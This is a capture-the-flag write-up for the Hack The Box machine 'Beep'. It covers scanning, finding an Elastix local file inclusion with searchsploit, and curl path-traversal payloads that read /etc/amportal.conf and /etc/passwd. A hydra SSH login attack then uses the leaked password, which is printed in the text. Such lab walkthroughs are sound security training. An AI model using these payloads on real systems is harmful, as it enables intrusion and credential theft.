Machine:Beep
IP Address:10.10.10.7
OS type:Linux
Difficulty:Easy
First step reconnaissance with nmap scan
nmap -sVC 10.10.10.7 -oN init.nmap -v
When we browse to http://10.10.10.7 , it automatically redirects to https://10.10.10.7 . And we can find that elastix login page was hosted on https://10.10.10.7 .
Elastix is an open source of VoIP. We can find if there is any vulnerability about Elastix on exploit-db by using searchsploit.
Searchsploit
searchsploit elastix
According to searchsploit output. There is a local file inclusion exploit. Let’s check it .
searchsploit -x php/webapps/37637.pl
LFI , Local File Inclusion
curl 'https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action' -k -o amportal.conf
We can include /etc/amportal.conf and dump it to our kali. And we can find the password in this configuration file.
We can include /etc/passwd to see which users the host contains.
curl 'https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action' -k -o users
There are six users having bash permission. We can store these users name to users.txt .
hydra
We can use hydra to crack the ssh service on this box.
hydra -L users.txt -p jEhdIekWmdjE ssh://10.10.10.7 -v
And we got root password. Now we can ssh to this box and get the flags.
find / -iname 'user.txt'
find / -iname 'root.txt'